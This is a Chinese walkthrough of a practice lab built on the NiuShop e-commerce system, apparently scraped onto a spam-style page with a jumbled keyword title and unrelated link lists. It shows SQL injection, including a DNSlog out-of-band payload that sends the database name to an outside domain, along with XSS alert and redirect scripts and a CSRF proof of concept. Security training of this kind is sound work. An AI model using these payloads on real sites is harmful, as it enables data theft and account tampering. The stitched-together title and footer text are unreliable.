当前位置: 首页 > news >正文

dede网站数据库路径成都室内设计公司排名前十

dede网站数据库路径,成都室内设计公司排名前十,青岛网站建设一青岛博采网络,网络平台怎么建立网站吗靶场搭建 将 niushop-master.zip 压缩包放到网站的根目录,解压后访问 浏览器访问 install.php ,根据提示安装即可 1.SQL注入漏洞 随便选择一种商品分类,发现有参数,测试注入 测试闭合发现页面报错有sql注入 应该是环境的问题&am…

靶场搭建

将 niushop-master.zip 压缩包放到网站的根目录,解压后访问

浏览器访问 install.php ,根据提示安装即可

1.SQL注入漏洞

随便选择一种商品分类,发现有参数,测试注入

测试闭合发现页面报错有sql注入

应该是环境的问题,但是这不影响我们判断存在sql注入

该网站还有一处sql注入漏洞,我们可以进入后台系统--设置--数据库管理--SQL执行与导入

输入查询语句,点击执行,成功执行,但是我们得不到具体信息,这时需要利用外带注入方法

外带原理:将dnslog平台中的特有字段payload带⼊⽬标发起dns请求,通过dns解析将请求后的关键信息组合新的三级域名带出,在dns服务器的dns⽇志中显示出来 DNSLog Platform

select load_file(concat('\\\\',(select database()),'.95xpzc.dnslog.cn\\abc'))

文件上传漏洞

1.首先写一个一句话木马

XSS漏洞

反射型xss漏洞

登录后台系统--设置--基础设置--商城第三方统计代码

在输入框中输入js弹窗代码,然后点击提交

<script>alert(1)</script>

返回前端页面,刷新,出现弹窗

后台系统还有一处反射型xss漏洞,点击网站--广告位--添加广告

<script>alert(1)</script>

返回前端刷新,点击该广告,页面会出现弹窗

存储型xss漏洞

后台系统还有一处,点击网站--广告位--添加广告

这里的 '链接地址' 可以尝试xss

在自己网站的根目录新建一个 2.html 文件,内容如下

<script>document.location="http://www.baidu.com"</script>

链接地址修改为www下的 2.html

返回前端,刷新页面,点击此广告,页面就会跳转到设置的界面

CSRF漏洞

注册一个普通用户,登录以后修改基本信息

使用bp抓取提交信息的请求包,鼠标右键--相关工具--生成CSRF-Poc--复制HTML

将复制的内容放到自己本地网站的根目录,浏览器访问

点击按钮,就会发现用户信息被修改,说明存在CSRF漏洞

支付漏洞

http://www.yayakq.cn/news/740637/

相关文章:

  • 邢台 建网站双流网站建设
  • 网站开发软件著作权归谁网页传奇游戏排行榜2022
  • 网站建设与管理 pdf如何查询网站备案进度
  • 网站错误页面模板学服装设计有前途吗
  • 营销型网站建设要点哪个公司做网站
  • 哈尔滨市建设网站网络广告推广的兼职
  • 深圳品牌型网站建设做个网站得投入多少
  • 顺德网站制作案例价位wordpress直播主题
  • 海口模板建站系统建设银行网站特色
  • 做网站维护学什么编程语言重庆网站的推广方式
  • 网站建设与管理资料下载温州论坛大罗山
  • wordpress五分钟建站做特卖的网站怎么赚钱
  • 自媒体采集网站建设金蝶erp系统介绍
  • 佛山北京网站建设公司哪家好网站如何添加外链
  • 网站做支付需要准备什么东西吗网站动态交互
  • 新闻做的差的网站浙江注册公司网站
  • 广州 网站建设公司医疗网站几个人做竞价
  • 酒店管理公司网站建设方案专门做优选的网站
  • 云南省建设厅官方网站哈尔滨网络优化推广公司
  • 定制网站开发如何免费创建企业网站
  • 手机屏幕网站网页设计师工作总结
  • 网站建设技术服务合同简约好看的网站模板
  • 网站导航栏原型图怎么做苏州家教网站建设
  • 福建建设人才市场官方网站nas可做网站服务器吗
  • 国外模板网站石家庄菜谱设计公司
  • 微信商城网站建设网站推广优化开发建设
  • 百度收录网站要多-邵阳网络公司-邵阳网站建设|邵阳网站制作
  • 凉山住房和城乡建设局网站大连网站建设领超最好
  • 建设网站 宣传平台织梦做仿站时 为何会发生本地地址跳转网站地址
  • 北京做电商网站设计网站做担保交易 是否资质